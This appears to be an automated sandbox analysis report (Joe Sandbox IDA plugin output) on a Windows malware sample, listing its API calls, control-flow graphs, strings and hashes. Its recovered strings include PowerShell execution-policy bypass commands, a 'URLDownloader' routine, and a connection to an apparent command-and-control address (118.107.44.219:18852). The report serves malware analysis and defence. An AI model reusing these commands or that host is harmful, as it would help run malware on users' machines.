                                                                                                                              • Part of subcall function 10005520: DeleteFileA.KERNEL32(1000A58A,?,1000A58A,00000000,?,?,?,0000005C,?), ref: 10005527
                                                                                                                              • Part of subcall function 10005300: ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
                                                                                                                              • Part of subcall function 10005300: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1000A5BB,000000FF,?), ref: 10005384
                                                                                                                              • Part of subcall function 10005300: SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
                                                                                                                            • Sleep.KERNEL32(000000C8,?,00000000,?,?,?,?,0000005C,?), ref: 1000A5D3
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000A630
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000A764
                                                                                                                            • Sleep.KERNEL32(000000C8,?,00000000), ref: 1000AB7C
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000ADA7
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000AE64
                                                                                                                            • WinExec.KERNEL32(00000000,00000000), ref: 1000AF3E
                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,?,00000063,?,00000070,?,?,00000000), ref: 1000AF49
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000B046
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000B0E2
                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000038), ref: 1000B20A
                                                                                                                            • ShellExecuteExA.SHELL32(?), ref: 1000B266
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1000B282
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 1000B28F
                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 1000B3A8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Smanip$Sleep$FileHandle$?write@?$basic_ostream@AttributesBios_base@std@@CloseD@std@@@std@@DeleteExecExecuteObjectPathShellSingleTempU?$char_traits@V12@Waitmemset
                                                                                                                            • String ID: /C $\PolicyManagement.xml$cmd.exe /C $powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"$powershell -ExecutionPolicy Bypass -File
                                                                                                                            • API String ID: 1867003993-2154795836
                                                                                                                            • Opcode ID: c3072d005594ebe148bccec5f2d8f621a0b2fb80094ec9400a32d8903ee167d9
                                                                                                                            • Instruction ID: 5ee5c772d32b0c25501e7099b99da70bcf1678fc7b94072c772d4481403b0835
                                                                                                                            • Opcode Fuzzy Hash: c3072d005594ebe148bccec5f2d8f621a0b2fb80094ec9400a32d8903ee167d9
                                                                                                                            • Instruction Fuzzy Hash: 88B24C74C08298DEEB25CB68CC45BDEBBB5AF15304F0441D9E14D67292DBB52B88CF62

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • InitCommonControlsEx.COMCTL32(00000008), ref: 10001903
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 1000190D
                                                                                                                            • CreateWindowExW.USER32(00000000,msctls_progress32,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 10001933
                                                                                                                            • SetWindowTheme.UXTHEME(0004045C,10018438,10018434), ref: 1000194E
                                                                                                                            • SendMessageW.USER32(0004045C,00000409,00000000,00D77800), ref: 10001967
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C), ref: 10001978
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000019F0,?,00000000,00000000), ref: 100019B9
                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 100019C4
                                                                                                                            • DefWindowProcW.USER32(00000002,?,?,?), ref: 100019DD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CreateMessage$CommonControlsHandleInitModulePostProcQuitSendThemeThreadmalloc
                                                                                                                            • String ID: $msctls_progress32$3Ro
                                                                                                                            • API String ID: 1181878002-754273676
                                                                                                                            • Opcode ID: f1c3b5bd482cc1038fd523d6cd0664b2522f3065c76e0cbb8d44deae0c0665e8
                                                                                                                            • Instruction ID: 07dac4f513f804ff03a6516b31f22f63e0bdfab53d31000085bea38267b703f6
                                                                                                                            • Opcode Fuzzy Hash: f1c3b5bd482cc1038fd523d6cd0664b2522f3065c76e0cbb8d44deae0c0665e8
                                                                                                                            • Instruction Fuzzy Hash: 03310675A40218FFF750CF94CC9AFAA77B4FB48701F208118FA05AA290C770DA00CB65

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 10001682
                                                                                                                              • Part of subcall function 10001430: SHGetKnownFolderPath.SHELL32(10018310,00000000,00000000,00000000), ref: 1000148B
                                                                                                                              • Part of subcall function 10001430: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 100014AA
                                                                                                                              • Part of subcall function 10001430: CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100014DE
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,10005760,00000000,00000000,00000000), ref: 10001798
                                                                                                                            • RegisterClassW.USER32(?), ref: 100017F7
                                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 100017FF
                                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 10001812
                                                                                                                            • CreateWindowExW.USER32(00000000,?,?,00C40000,?,?,00000190,00000078,00000000,00000000,00000000,00000000), ref: 1000185E
                                                                                                                            • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,10017426), ref: 1000186D
                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 10001894
                                                                                                                            • TranslateMessage.USER32(?), ref: 100018A2
                                                                                                                            • DispatchMessageW.USER32(?), ref: 100018AC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateMessageMetricsSystemWindow$CallbackClassDispatchDispatcherFolderFreeHandleKnownModulePathRegisterShowTaskThreadTranslateUserwcstombs
                                                                                                                            • String ID: URLDownloader
                                                                                                                            • API String ID: 73900685-1891997712
                                                                                                                            • Opcode ID: 427fb0662738fb6037c45c3c081c75d8746fa49f42a236919258716a76932914
                                                                                                                            • Instruction ID: 8631f2352c9d4e8355fdf3fc5455be072e9b283b4b7067b2d869b395449685d5
                                                                                                                            • Opcode Fuzzy Hash: 427fb0662738fb6037c45c3c081c75d8746fa49f42a236919258716a76932914
                                                                                                                            • Instruction Fuzzy Hash: 807110B5D00218EFEB54CFA4CC45FDEBBB4EB48700F108169E619A7295EB74AA44CF51

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 10015750: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10015783
                                                                                                                              • Part of subcall function 10015700: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001571E
                                                                                                                            • _Smanip.LIBCPMTD ref: 10015B0A
                                                                                                                            • _Smanip.LIBCPMTD ref: 10015BA4
                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000038,?,?,?,0000002F,?,00000070,?), ref: 10015C85
                                                                                                                            • ShellExecuteExA.SHELL32(0000003C,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015CE1
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015CFD
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015D0A
                                                                                                                            • CopyFileA.KERNEL32(00000000,?,00000000), ref: 10015D73
                                                                                                                            • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 10015D99
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$ExecuteModuleNameShellSmanip$CloseCopyHandleObjectSingleWaitmemset
                                                                                                                            • String ID: %s\%s$open
                                                                                                                            • API String ID: 1843445691-538903891
                                                                                                                            • Opcode ID: 0874a88fbfece6f8bf1c8d8ced0699038052d698083af6ca92b648841300b0f5
                                                                                                                            • Instruction ID: 9eb432f15a048c8dfdefea35090f5a4ff5850cd705bbf9561c51413f96cb23ad
                                                                                                                            • Opcode Fuzzy Hash: 0874a88fbfece6f8bf1c8d8ced0699038052d698083af6ca92b648841300b0f5
                                                                                                                            • Instruction Fuzzy Hash: 48021374C083D8DEEB11CBA4C859BDDBFB5AF15304F0441D9D1496B282DBBA5B88CB62

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,100185DC), ref: 10015E0A
                                                                                                                            • GetLastError.KERNEL32 ref: 10015E13
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 10015E24
                                                                                                                            • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015E2C
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 10015E3C
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 10015E43
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,1000B570,00000000,00000000,00000000), ref: 10015E58
                                                                                                                            • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015E65
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThreadexit$CloseCurrentErrorHandleLastMutexObjectSingleWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 355449500-0

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 1016 1000281e-1000282b 1018 10002831-10002847 call 10001da0 1016->1018 1019 10002926-1000293f exit 1016->1019 1022 10002915-10002920 Sleep 1018->1022 1023 1000284d-10002865 call 10001e30 1018->1023 1022->1019 1026 10002870-10002874 1023->1026 1027 10002913 1026->1027 1028 1000287a-100028cd Sleep call 10002b60 call 10002da0 call 10001fa0 call 10002cb0 1026->1028 1027->1019 1037 1000290e 1028->1037 1038 100028cf-1000290c call 100029f0 call 10001f10 call 10002960 1028->1038 1037->1027 1040 10002867-1000286d 1037->1040 1038->1027 1040->1026
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 1000291A
                                                                                                                              • Part of subcall function 10001E30: VariantInit.OLEAUT32(?), ref: 10001EAA
                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 1000287F
                                                                                                                              • Part of subcall function 10001FA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001FAD
                                                                                                                            • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10002928
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep$CreateInitSnapshotToolhelp32Variantexit
                                                                                                                            • String ID: .NET Framework Action$.NET Framework Action$.NET Framework Action
                                                                                                                            • API String ID: 4205734914-2913467848

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 10012FBA
                                                                                                                            • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(00000000), ref: 10012FE7
                                                                                                                            • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,00000040,00000022,?), ref: 10013068
                                                                                                                            Similarity
                                                                                                                            • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_ostream@?setstate@?$basic_ios@D@std@@@1@_V?$basic_streambuf@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2185338108-0

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • SHGetKnownFolderPath.SHELL32(10018310,00000000,00000000,00000000), ref: 1000148B
                                                                                                                            • wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 100014AA
                                                                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100014DE
                                                                                                                            Similarity
                                                                                                                            • API ID: FolderFreeKnownPathTaskwcstombs
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2577077003-0

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
                                                                                                                            • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1000A5BB,000000FF,?), ref: 10005384
                                                                                                                              • Part of subcall function 10012400: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,10005395), ref: 1001242D
                                                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
                                                                                                                            Similarity
                                                                                                                            • API ID: D@std@@@std@@U?$char_traits@$?setstate@?$basic_ios@?write@?$basic_ostream@AttributesBios_base@std@@FileV12@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1581416325-0

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • ?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000022,00000040,1001304F,000000FF,?,1001304F,00000040,00000022,?), ref: 100135F7
                                                                                                                            Similarity
                                                                                                                            • API ID: Fiopen@std@@U_iobuf@@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2284775142-0

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 1100 10012f10-10012f20 1101 10012f63 1100->1101 1102 10012f22-10012f3d call 10012c90 call 10012d20 1100->1102 1104 10012f6a-10012f7c call 10012e40 1101->1104 1110 10012f46-10012f58 fclose 1102->1110 1111 10012f3f 1102->1111 1112 10012f61 1110->1112 1113 10012f5a 1110->1113 1111->1110 1112->1104 1113->1112
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 10012C90: ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(100053B9,?,10012F2A,?,100053B9), ref: 10012C9A
                                                                                                                              • Part of subcall function 10012C90: ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP140(CCC35DE5,CCC35DE5,8B55CCCC,?,10012F2A,?,100053B9), ref: 10012CC2
                                                                                                                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(0175FE68,?,100053B9), ref: 10012F4D
                                                                                                                            Similarity
                                                                                                                            • API ID: D@std@@@std@@U?$char_traits@$?eback@?$basic_streambuf@?setg@?$basic_streambuf@D00@fclose
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2996004546-0

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 10012F10: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(0175FE68,?,100053B9), ref: 10012F4D
                                                                                                                            • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,10005395), ref: 1001242D
                                                                                                                            Similarity
                                                                                                                            • API ID: ?setstate@?$basic_ios@D@std@@@std@@U?$char_traits@fclose
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2040537880-0

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1119 10005520-1000552f DeleteFileA 1120 10005531-10005533 1119->1120 1121 10005537 1119->1121 1122 10005539-1000553a 1120->1122 1121->1122
                                                                                                                            APIs
                                                                                                                            • DeleteFileA.KERNEL32(1000A58A,?,1000A58A,00000000,?,?,?,0000005C,?), ref: 10005527
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4033686569-0
                                                                                                                            APIs
                                                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,?,1000B3D6,?,00000000), ref: 10005751
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 026218E4
                                                                                                                            • CreateWindowExW.USER32(00000000,10018410,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 0262190A
                                                                                                                            • SendMessageW.USER32(1001C6F0,00000409,00000000,00D77800), ref: 0262193E
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,100019F0,?,00000000,00000000), ref: 02621990
                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 0262199B
                                                                                                                            • NtdllDefWindowProc_W.NTDLL(00000002,?,?,?), ref: 026219B4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateMessageWindow$HandleModuleNtdllPostProc_QuitSendThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4292518056-3916222277
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001FAD
                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000228), ref: 10001FDB
                                                                                                                            • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 10001FEE
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 10002015
                                                                                                                            • CloseHandle.KERNEL32(000000FF,?,?), ref: 10002055
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharCloseCreateFirstHandleMultiProcess32SnapshotToolhelp32Widememset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3952204985-0
                                                                                                                            APIs
                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,00000001), ref: 10016A6A
                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000003), ref: 10016A90
                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000050), ref: 10016B1A
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 10016B36
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10016B4F
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 10016B59
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1045392073-0
                                                                                                                            APIs
                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 10016C06
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 10016C15
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 10016C1E
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 10016C2B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2933794660-0
                                                                                                                            APIs
                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 10016737
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2325560087-0
                                                                                                                            APIs
                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0263670E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2325560087-0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                                                                            • Instruction ID: bcf11820cf15e6dd1a9b0761c6477f72427a0084a1aec283165053ba3dece4b4
                                                                                                                            • Opcode Fuzzy Hash: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                                                                            • Instruction Fuzzy Hash: DC319A76A08B668FC324DF18C480926B7E4FF99319F1A096DE88587312E331F959CF91
                                                                                                                            APIs
                                                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 100154B3
                                                                                                                            • getaddrinfo.WS2_32(118.107.44.219,18852,?,00000000), ref: 100154FA
                                                                                                                            • WSACleanup.WS2_32 ref: 10015509
                                                                                                                            • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015511
                                                                                                                            • socket.WS2_32(?,?,?), ref: 10015552
                                                                                                                            • WSACleanup.WS2_32 ref: 10015566
                                                                                                                            • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 1001556E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
